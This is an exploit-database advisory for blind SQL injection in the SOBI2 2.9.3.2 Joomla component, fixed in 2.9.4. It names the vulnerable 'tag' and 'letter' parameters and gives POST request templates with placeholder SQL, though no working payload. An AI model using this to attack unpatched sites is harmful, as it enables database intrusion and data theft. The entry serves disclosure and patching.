[] NeoSense

Joomla! Component com_sobi2 2.9.3.2 - Blind SQL Injections

Author: jdc
type: webapps
platform: php
port: 
date_added: 2011-07-14 
date_updated: 2016-11-02 
verified: 1 
codes: OSVDB-73828 
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: SOBI2 2.9.3.2 Joomla! Component Blind SQL Injections
# Date: 13 July 2011
# Author: jdc
# Software Link: http://www.sigsiu.net
# Version: 2.9.3.2
# Fixed In: 2.9.4
# Verified: http://www.sigsiu.net/changelog as "# Bugfix: Blind SQL injection"

Versions prior to 2.9.4 suffer from a blind sql injection in both the "tag" and "letter" parameters. The request MUST reach the site with these parameters urlencoded for the injection to succeed.

POSTDATA: option=com_sobi2&tmpl=component&tag=[Encoded SQL]

POSTDATA: option=com_sobi2&tmpl=component&letter=[Encoded SQL]

Updated release: http://www.sigsiu.net/latest_news/sobi2_version_2.9.4_released.html